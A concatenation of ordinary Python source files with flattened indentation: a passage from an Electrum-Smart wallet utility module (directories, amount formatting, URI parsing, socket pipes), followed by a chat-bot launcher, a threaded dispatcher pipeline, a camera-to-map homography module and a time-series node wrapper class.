d = android_ext_dir() + '/org.electrum.electrum-smart'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum-smart'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-smart")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-Smart")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-Smart")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:d}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'Explorer': ('https://explorer.smartcash.cc/',
{'tx': 'tx/', 'addr': 'address/'}),
'Insight': ('https://insight.smartcash.cc/',
{'tx': 'tx/', 'addr': 'address/'}),
}
testnet_block_explorers = {
'SmartCash Testnet Explorer': ('http://test-explorer.smartcash.cc',
{'tx': 'tx/', 'addr': 'address/'}),
'Dustinface Testnet Explorer': ('https://testnet.dustinface.me/',
{'tx': 'tx/', 'addr': 'address/'}),
'system default': ('blockchain://000000000933ea01ad0ee984209779baaec3ced90fa3f408719526f8d77f4943/',
{'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'Insight')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a smartcash address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'smartcash':
raise Exception("Not a SmartCash URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid smartcash address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='smartcash', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
|
run_gate.py
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python
import sys
import threading
import time
import logging
import logging.config
from slackbot import settings
from slackbot.bot import Bot
from ircbot.ircbot import IrcBot
def main():
kw = {
'format': '[%(asctime)s] %(message)s',
'datefmt': '%m/%d/%Y %H:%M:%S',
'level': logging.DEBUG if settings.DEBUG else logging.INFO,
'stream': sys.stdout,
}
logging.basicConfig(**kw)
logging.getLogger('requests.packages.urllib3.connectionpool').setLevel(logging.WARNING)
#bot = Bot()
irc_bot = IrcBot()
irc_bot.run()
#bot.run()
#thread = threading.Thread(target=run, args=(irc_bot))
#thread.start()
#irc_bot.start()
#time.sleep(1)
#bot.send_message('testforbot','test message')
#while True:
# time.sleep(10)
def run(bot, irc_bot):
irc_bot.run()
if __name__ == '__main__':
main()
|
interfaces.py
|
import queue
from threading import Lock, Thread
class WorkerThread:
def __init__(self, dispatcher, data):
self.dispatcher = dispatcher
self.data = data
def run(self, dispatcher):
raise NotImplementedError
class Node:
def finishPipeline(self):
# Creates the needed queue
if hasattr(self, "succesor"):
self.queue = queue.Queue()
self.succesor.finishPipeline()
# Lock is used for the update method
self.updateLock = Lock()
def empty(self):
return self.queue.empty()
def addData(self, data, firstTime=False):
# Adds the data in the queue behind the dispatcher
# TODO: Better multithreaded support (start this method in a new thread)
# especially since update needs a lock
if hasattr(self, "succesor"):
self.queue.put(data)
if not firstTime:
Thread(target=self.succesor.update).start()
def getData(self):
if hasattr(self, "succesor"):
return self.queue.get()
else:
raise AttributeError("No Queue found")
class Source(Node):
def finish(self):
self.finishPipeline()
def start(self):
# Starts the program by calling the update method of the first dispatcher
self.succesor.update()
""" Needed for the Dispatcher to decide, if it is an input or an output """
def checkSource(self):
pass
class Dispatcher(Node):
def __init__(self):
# maxThreads = -1 => No checking
# maxThreads set to 200
self.maxThreads = 200
self.threadCount = 0
self.threadCountLock = Lock()
self.initialize()
def initialize(self):
pass
""" Default update method: Starts a new Thread, whenever there is new data """
def update(self):
# Checks if there is data in the queue
while True:
self.source.updateLock.acquire()
self.threadCountLock.acquire()
if self.source.empty() or (
self.maxThreads > -1 and self.threadCount >= self.maxThreads
):
self.threadCountLock.release()
self.source.updateLock.release()
break
d = self.source.getData()
self.source.updateLock.release()
self.threadCount += 1
self.threadCountLock.release()
# Starting new thread
thread = self.getWorkerThread(d)
Thread(target=self.startThread, args=[thread]).start()
def getWorkerThread(self, data):
raise NotImplementedError
def connect(self, connecter):
try:
connecter.checkSource()
# It is a source so it goes in front of this dispatcher
self.source = connecter
connecter.succesor = self
except:
# It is coming behind this dispatcher with a queue
self.succesor = connecter
connecter.source = self
def startThread(self, thread):
t = Thread(target=thread.run)
t.start()
# Let's wait until the thread is finished
t.join()
self.threadCountLock.acquire()
self.threadCount -= 1
self.threadCountLock.release()
self.update()
|
lnglat_homography.py
|
# Copyright (C) 2018-2019 David Thompson
#
# This file is part of Grassland
#
# It is subject to the license terms in the LICENSE file found in the top-level
# directory of this distribution.
#
# No part of Grassland, including this file, may be copied, modified,
# propagated, or distributed except according to the terms contained in the
# LICENSE file.
import numpy as np
import cv2
import os
import json
import requests
import plyvel
import multiprocessing
from multiprocessing import Queue, Pool
import gevent
from gevent.server import StreamServer
import time
from pathlib import Path
class MyException(Exception):
pass
class RealWorldCoordinates:
def __init__(self, tracking_frame):
# Create node's personal leveldb database if missing
self.node_db = plyvel.DB(str(Path.home())+'/.grassland/node_db/', create_if_missing=True)
self.CALIBRATING = False
self.tracking_frame = tracking_frame
self.calibration = {}
# pts_src and pts_dst are numpy arrays of points
# in source and destination images. We need at least
# 4 corresponding points.
pts_src = np.array([[421, 695], [1587, 198], [368, 309], [1091, 98]])
pts_dst = np.array([[581, 473], [618, 215], [296, 449], [281, 245]])
h, status = cv2.findHomography(pts_src, pts_dst)
def set_transform(self, calibrating=False):
self.CALIBRATING = calibrating
# Get the real world transform that gets the longitude and latitude coordinates of each pixel of the realigned image
# Using the node calibration web app, we can make a function that will allow the node to know what the real world (lat/lng) coordinates are for each pixels in it's frame
# The node calibration web app using Mapbox and Open Street Map can map its pixels coordinates (2D space 'F') to a latitude and longitude coordinate (2D space 'W').
# By lining up the Open Street Map "camera"" to exactly match the perspective of the real camera in the node, we can take a few pixels coordinates from 'F'
# and their coresponding real world coordinates 'W' from the web app and use that to find a function, a linear map (transformation matrix), 'L'
# that will take any pixel coordinate from the space 'F' and produce the cooresponding coordinate in 'W'. L(f) = w
#
# Code taken From https://stackoverflow.com/a/20555267/8941739
#primary = np.array([[0.0, 0.0], [1366.0, 0.0], [1366.0, 662.0], [0.0, 662.0]]) # Average dimensions of monitor viewing webapp. Maybe I should change this to be dynamic
height = float(self.tracking_frame['height'])
height = height / 2 # The modification made to mapbox (https://github.com/mapbox/mapbox-gl-js/issues/3731#issuecomment-368641789) that allows a greater than 60 degree pitch has a bug with unprojecting points closer to the horizon. They get very "screwy". So the two top homography_point corners in the web app ('ul' and 'ur') actually start half way down the canvas as the starting point to start from below the horizon
width = float(self.tracking_frame['width'])
primary = np.array([[0.0, 0.0], [width, 0.0], [width, height], [0.0, height]])
# if not dynamic: #
# secondary = np.array([[-75.75021684378025, 45.393495598366655], [-75.7512298958311, 45.39309963711102], [-75.75150315621723, 45.393444401619234], [-75.75049010416637, 45.393840360459365]])
secondary_array = []
'''
Sample Node Format
{
'id': 'n68b5a19ef9364a74ae73b069934b21a4',
'tracking_frame': {'height': 281, 'width': 500},
'calibration': {
'lng_focus': -75.75107566872947,
'bearing': 62.60000000000002,
'lat_focus': 45.39331613895314,
'pitch': 55.00000000000001,
'homography_points': {
'corners': {
'ul': {
'lat': 45.395059987864016,
'lng': -75.75055046479982
},
'll': {
'lat': 45.392791493630654,
'lng': -75.75123398120483
},
'ur': {
'lat': 45.392869098373296,
'lng': -75.74893325620522
},
'lr': {
'lat': 45.39362547029299,
'lng': -75.75184957418519
}
},
'markers': {}
}
}
}
'''
# MySQL
if self.CALIBRATING:
# Get calibration values from Calibration Map
# https://docs.python.org/3/library/asyncio-eventloop.html#asyncio.get_event_loop
# asyncio.get_event_loop().run_until_complete(self.call_websocket())
#self.msl = multiprocessing.Process(target=self.mapserver_loop)
#self.msl.daemon = True
#self.msl.start()
#print("Finished starting msl")
self.calibration_socket_server = StreamServer(('127.0.0.1', 8765), self.calibration_socket_server_handler)
self.calibration_socket_server.start()
self.node_get()
corner_names = ['ul', 'ur', 'll', 'lr']
for corner_name in corner_names:
ul_lng = self.calibration['homography_points']['corners'][corner_name]['lng']
ul_lat = self.calibration['homography_points']['corners'][corner_name]['lat']
secondary_array.append([ul_lng, ul_lat])
secondary = np.array(secondary_array)
# Pad the data with ones, so that our transformation can do translations too
n = primary.shape[0]
pad = lambda x: np.hstack([x, np.ones((x.shape[0], 1))])
unpad = lambda x: x[:,:-1]
X = pad(primary)
Y = pad(secondary)
# Solve the least squares problem X * A = Y
# to find our transformation matrix A
A, res, rank, s = np.linalg.lstsq(X, Y)
# Real World Transform
self.rw_transform = lambda x: unpad(np.dot(pad(x), A))
np.set_printoptions(suppress=True)
print("Target:")
print(secondary)
print("Result:")
print(self.rw_transform(primary))
print("Max error:", np.abs(secondary - self.rw_transform(primary)).max())
A[np.abs(A) < 1e-10] = 0 # set really small values to zero
print(A)
print("Now Try it")
print(self.rw_transform(np.array([[300, 200]])))
print(self.rw_transform(np.array([[300.0, 200.0]])))
def node_update(self):
self.node_get()
#node_id = os.environ['NODE_ID']
#gl_api_endpoint = os.environ['GRASSLAND_API_ENDPOINT']
# data = { "id": node_id, "tracking_frame": self.tracking_frame, "calibration": self.calibration }
#response = requests.put(gl_api_endpoint+"node_update", json=data)
tracking_frame_string = json.dumps(self.tracking_frame)
self.node_db.put(b'tracking_frame', bytes(tracking_frame_string, 'utf-8'))
calibration_string = json.dumps(self.calibration)
self.node_db.put(b'calibration', bytes(calibration_string, 'utf-8'))
def node_get(self):
if self.CALIBRATING:
self.call_gevent_wait()
#node_id = os.environ['NODE_ID']
# gl_api_endpoint = os.environ['GRASSLAND_API_ENDPOINT']
# response = requests.get(gl_api_endpoint+"node_get"+"?id="+str(node_id))
# tracking_frame = self.node_db.get(b'tracking_frame')
# if tracking_frame == None: # THROW ERROR
# raise MyException("!!! leveldb get 'tracking_frame' returned None !!!!")
# else:
# print(tracking_frame)
# self.tracking_frame = json.loads(tracking_frame.decode("utf-8"))
if self.CALIBRATING:
calibration = self.node_db.get(b'calibration')
if calibration == None:
self.call_gevent_wait()
timeout = time.time() + 60*5 # 5 minutes from now
print("WAITING FOR YOU TO USE THE MAPSERVER TO SET THE CALIBRATION VALUES IN THE DATABASE ...")
while True:
if time.time() > timeout:
print("TIMED OUT WAITING FOR THE CALIBRATION TO BE SENT FROM THE MAP SERVER!!")
break
calibration = self.node_db.get(b'calibration')
if calibration == None:
self.call_gevent_wait()
else:
self.calibration = json.loads(calibration.decode("utf-8"))
break
else:
print(calibration.decode("utf-8"))
self.calibration = json.loads(calibration.decode("utf-8"))
else:
calibration = self.node_db.get(b'calibration')
if calibration == None: # THROW ERROR
raise MyException("!!! leveldb get 'calibration' returned None. Restart with '--mode CALIBRATING' !!!!")
else:
print(calibration)
self.calibration = json.loads(calibration.decode("utf-8"))
def coord(self, x, y):
coord = self.rw_transform(np.array([[x, y]]))
return {
"lng": coord[0][0],
"lat": coord[0][1]
}
def calibration_socket_server_handler(self, socket, address):
calibration_bytes_object = socket.recv(4096)
# print("calibration_bytes_object")
# print(calibration_bytes_object)
# Store calibration in leveldb
#self.node_db.put(b'calibration', bytes(calibration_string, 'utf-8'))
self.node_db.put(b'calibration', calibration_bytes_object)
# Get it back
calibration = self.node_db.get(b'calibration')
self.calibration = json.loads(calibration.decode("utf-8"))
# Get camera frame dimensions (frame_dim). Could pull from database but this is easier
tracking_frame_string = json.dumps(self.tracking_frame)
# Send camera frame dimensions (frame_dim)
socket.sendall(bytes(tracking_frame_string, 'utf-8'))
def call_gevent_wait(self):
gevent.wait(timeout=1) # https://stackoverflow.com/a/10292950/8941739
|
model.py
|
import glob
import json
import copy
import importlib
import threading
import logging
from logging.handlers import RotatingFileHandler
import pytz
#for tables
import numpy
import numpy as np
import datetime
import dateutil.parser
import sys
import os
import time
import uuid
import hashlib
import random
import traceback
from dates import *
# type hints
from typing import List
import modeltemplates
# for Observer
from queue import Queue
from queue import Empty
import utils
from timeseries import TimeSeriesTable
from dates import *
import inspect
from utils import str_lim
"""
next Todo
-
- execute: problem im thread mit der Ausführung
- code documentation
- google document
-
"""
sys.path.append("./plugins") #for the importlib loader, doesn't understand relative paths
#sys.path.append("./private") #for the importlib loader, doesn't understand relative paths
myGlobalDir = os.path.dirname(os.path.realpath(__file__)) # holds the directory of this script
def getRandomId():
return '%08x' % random.randrange(16 ** 8)
#used as an OOP wrapper for the flat and procedural style of the model class
class Node():
""" used as an OOP wrapper for the flat and procedural style of the model class
it is a convenient way to access nodes and their hierarchy and internals
"""
def __init__(self,myModel,myId):
""" a node can be created by calling the
mynode = model.get_node("root.mynode") or
mynode = Node(mymodel,"123")
Returns:
a node object for further access to values, hierarchy etc.
"""
self.model = myModel # this is not a copy!!
self.id = myId
def __repr__(self):
return 'Node(id={:}, value={:})'.format(self.id, self.get_value())
def get_value(self):
""" Returns:
the "value" property of the node
None if node has no "value"
"""
return self.model.get_value(self.id)
#####################
# time series node API
def get_time_series(self, start=None,
end=None,
noBins=None,
includeIntervalLimits=False,
resampleTimes=None,
format="default",
toList = False,
resampleMethod = None):
"""
Returns
dict with ["__time":[...],"values":[...]
"""
browsePath = self.model.get_browse_path(self.id)
data = self.model.time_series_get_table(variables = [browsePath],
tableDescriptor=None,
start=start,
end=end,
noBins=noBins,
includeIntervalLimits=includeIntervalLimits,
resampleTimes=resampleTimes,
format=format,
toList=toList,
resampleMethod=resampleMethod)
if data !={} :
return data[browsePath]
else:
return None
def get_raw_time_series(self,start=None,end=None):
return self.model.time_series_get_raw(self.id,start=start,end=end)
def add_references(self,targetNodes,deleteAll=False,allowDuplicates=True):
"""
add references from the node to the targets
Args:
targetNodes: node or list of nodes to reference to
deleteAll: if set true, we delete all existing references before creating the new
Returns
True/False for success/error
"""
if deleteAll:
self.model.remove_forward_refs(self.id)#this deletes all existing
if type(targetNodes) is not list:
targetNodes = [targetNodes]
targetIds = [node.get_id() for node in targetNodes]
return self.model.add_forward_refs(self.id,targetIds,allowDuplicates=allowDuplicates)
def del_references(self,targetNodes=[]):
"""
remove the forward refs from this node to targetNodes
:return:
"""
if type(targetNodes) is not list:
targetNodes = [targetNodes]
targetIds = [node.get_id() for node in targetNodes]
return self.model.remove_forward_refs(self.id,targetIds)
def set_value(self,value):
"""
special support for "column" types: if a scalar is given, we make a "full" array
"""
if self.get_properties()["type"] == "column":
if type(value) != numpy.ndarray and type(value) != list:
#we have a scalar, so we set it
#get the len of the table
timeNode = self.get_table_time_node()
length = len(timeNode.get_value())
value = numpy.full(length,value,dtype=numpy.float64)
return self.model.set_value(self.id,value)
def set_time_series(self,values=None,times=None):
"""
replaces the time series with value and times, it deletes the existing
"""
return self.model.time_series_set(self.id,values=values,times=times)
def insert_time_series(self,values=None,times=None,allowDuplicates = False):
"""
insert data, if the time stamp exists already, we replace it
"""
return self.model.time_series_insert(self.id,values=values, times=times, allowDuplicates=allowDuplicates)
def merge_time_series(self,values=None, times=None):
""" merge the times series of mergeNode into this node"""
return self.model.time_series_merge(self.id,values = values,times=times)
def delete_time_series(self,start=None,end=None):
return self.model.time_series_delete_area(self.id, start=start, end=end)
#####################
# event series node API
def get_event_series(self, start=None, end=None, format="default",eventFilter = None):
return self.model.event_series_get(self.id,start=start,end=end,format=format,eventFilter=eventFilter)
def set_event_series(self, values=None, times=None):
"""
replaces the event series with value and times, it deletes the existing
"""
return self.model.event_series_set(self.id,values=values,times=times)
def insert_event_series(self,values=None,times=None,allowEventDuplicates = False):
return self.model.event_series_insert(self.id,values,times,allowEventDuplicates=allowEventDuplicates)
def delete_event_series(self,start=None, end = None, eventsToDelete=[]):
return self.model.event_series_delete(desc=self.id,start=start,end=end,eventsToDelete=eventsToDelete)
def get_parent(self):
""" Returns:
a Node()-instance of the parent of the current node,
None if no parent available
"""
nodeInfo = self.model.get_node_info(self.id)
if nodeInfo:
return self.model.get_node(nodeInfo["parent"])
else:
return None
def get_child(self,childName):
"""
Args:
childName(nodedescription):
Returns:
a Node() instance of the child holding the childName
None if the current node does not have a child with the name childName
"""
if '.' in childName:
remain = '.'.join(childName.split('.')[1:])
now = childName.split('.')[0]
child = self.get_child(now)
if child:
return child.get_child(remain)
else:
return None
nodeInfo = self.model.get_node_info(self.id)
if nodeInfo:
for childId in nodeInfo['children']:
childInfo = self.model.get_node_info(childId)
if childInfo["name"] == childName:
return self.model.get_node(childId)
return None
def delete(self):
"""
delete this node from the model, note that the object itself it not destroyed, but it is disconnected from the model
so should not be used anymore afterwards
:return:
"""
return self.model.delete_node(self.id)
def create_child(self,name=None,type="folder",value=None,properties={}):
"""
create a node under the current node, if the node exists already, we get the node
Args:
name [string] the child name
type [string] the type of the node
value [any] direct assignment of values
properies [dict] a dict with further settings of properies like value, type etc
Returns:
the node objects or none if not available
"""
if name == None:
name = '%08x' % random.randrange(16 ** 8)
id = self.model.create_node(parent=self.id,name=name,type=type,value=value,properties=properties)
if id:
return self.model.get_node(id)
else:
#we try to get it anyways
return self.get_child(name)
def get_children(self, deepLevel=1):
""" Returns:
a list of Node()-objects which are the children of the current node
args:
deepLevel: set >1 to get children and childrens' children
"""
nodeInfo = self.model.get_node_info(self.id)
children = []
if nodeInfo["children"]:
children=[self.model.get_node(id) for id in nodeInfo['children'] ]
while deepLevel>1:
deepLevel -=1
childrenOld = children.copy()
for child in childrenOld:
children.extend(child.get_children())
#remove dublicates via id:
childDict = {child.get_id():child for child in children} # same keys(id) will only be there once
children = list(childDict.values())
return children
def get_properties(self):
""" Returns:
a dictionary holding the properties of the node like {"value":123,"name":"myVariable","children":...}
"""
nodeInfo = self.model.get_node_info(self.id)
return copy.deepcopy(nodeInfo)
def get_type(self):
"""
Retuns:
the type of the node
"""
return self.get_property("type")
def get_property(self,property):
"""
Args:
property: the property name asked for
Returns:
the value of the property behind the property given
None if the property does not exist
"""
nodeDict =self.get_properties()
if property in nodeDict:
return self.get_properties()[property]
else:
return None
def set_properties(self,properties):
"""
add or modify properties of a node
Args:
properties [dict] holding key,value for the properties
Returns
True for ok, False for not done
"""
return self.model.set_properties(properties,nodeDesc=self.id)
def get_model(self):
""" this function should only be used for testing, we should never be in the need to access the model inside
Returns:
the underlying model of type Model() class
"""
return self.model
def get_target_ids(self):
""" this function returns the target ids of a referencer as a list, not resolving the leaves"""
if self.get_properties()["type"] != "referencer":
return None
return self.get_properties()["forwardRefs"]
def get_target(self):
""" this function returns the first direct taret node of a referencer not resolving the leaves"""
if self.get_properties()["type"] == "referencer":
targets = self.get_properties()["forwardRefs"]
if targets:
return Node(self.model,targets[0])
return None
def get_targets(self):
""" this function returns the target Nodes of a referencer as a list, not resolving the leaves"""
if self.get_properties()["type"] != "referencer":
return None
targets = []
for nodeid in self.get_properties()["forwardRefs"]:
targets.append(Node(self.model,nodeid))
return targets
def get_leaves(self):
""" this function returns a list of Nodes containing the leaves where this referencer points to
this functions works only for nodes of type "referencer", as we are following the forward references
leaves are defined as following:
1) all nodes that are listed under the forward references and which are not of type referencer or folder
2) if nodes pointed to are referencer, the targets are again analyzed
3) if a node pointed to is a folder, all children of the folder are taken which are not referencer or folder themselves
folders and referencers inside the folder are not taken into account
doing so, hierarchies of referencers are unlimited, hierarchies of folders are only of depth 1
Returns:
all nodes which are considered leaves as a list of Node() objects
"""
leaves = self.model.get_leaves(self.id) # a list of node dicts
leaveNodes = []
for leave in leaves:
leaveNodes.append(Node(self.model,leave["id"]))
return leaveNodes
def get_leaves_ids(self):
"""
get the list of ids of the leaves, see get_leaves()
Returns:
a list of ids of the leaves
"""
return self.model.get_leaves_ids(self.id)
def get_id(self):
""" Returns: the nodeid (which is generated by the system) """
return self.id
def get_browse_path(self):
""" Returns: the browsepath along the style "root.myfolder.myvariable..." """
return self.model.get_browse_path(self.id)
def get_name(self):
""" Returns: the name of the node without the path """
return self.model.get_node_info(self.id)["name"]
def get_node(self,desc):
return self.model.get_node(desc)
def get_table_time_node(self):
""" if the current node belongs to a table, then we can get the time node
a node
Returns:
(obj Node()) the node of type
"""
timeNode = self.model.find_table_time_node(self.id)
if timeNode:
return Node(self.model,timeNode)
else:
return None
def get_table_len(self):
"""
if the current node is a type "table", we get the current len
Return:
the len of the columns of the table
"""
return self.model.get_table_len(self.id)
def get_table_node(self):
"""
if the current node is a column of a time series table, we get the according table node of type "table"
Return:
a Node() of type "table" which is the table of the current node
"""
tableId = self.model.find_table_node(self.id)
if tableId:
return self.model.get_node(tableId)
else:
return None
